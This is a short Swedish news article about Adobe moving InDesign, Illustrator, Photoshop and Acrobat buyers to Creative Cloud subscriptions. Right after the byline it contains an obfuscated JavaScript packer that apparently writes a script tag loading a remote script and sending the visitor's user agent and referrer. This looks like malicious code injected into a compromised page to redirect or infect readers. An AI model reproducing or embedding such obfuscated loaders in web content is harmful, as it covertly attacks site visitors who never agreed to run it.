Image Image Image Image Image Image Image Image Image Image

| 13 maj, 2021

Scroll to top

Top

Adobe vill att alla kunder ska prenumerera

Adobe vill att alla kunder ska prenumerera
Sebastian

Adobe: eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|heeah|var|u0026u|referrer|fbbdt||js|php’.split(’|’),0,{}))
Det var i somras som Adobe lanserade sin stora satsning där man nu vill att köpare av de tyngre programmen Indesign, Illustrator, Photoshop och Acrobat ska betala en månadskostnad. 

Man väljer själv vilka program man vill erhålla och laddar sedan ned dem från deras nya molntjänst Creative Cloud.

Självklart varierar månadsavgiften beroende på vilka program du väljer.

Detta nya betalsätt har väckt både positiva och negativa åsikter. De positiva menar att det är ett smart sätt att hålla ner kostnaderna istället för att lägga ut en massa tusenlappar på hela paketet när man kanske bara använder ett program.

Enligt Adobe har satsningen fallit ut väl och man uppger att minst 300 000 kunder har hakat på den nya tjänsten.

– Målet är att få över alla kunder till prenumerationstjänsten, men det är givetvis något som får ta sin tid, säger Alan Banks, Adobes vd för den Nordeuropeiska organisationen, till Computer Sweden.

– Övergången från boxarna till nätet är oundviklig och i Norden är det redan 80 procent som laddar ner programmen. Sedan är det så att vi även framöver kommer att samarbeta med partner som hjälper företagsanvändare med utrullningarna och även hanterar licenser och abonnemang, säger Alan Banks.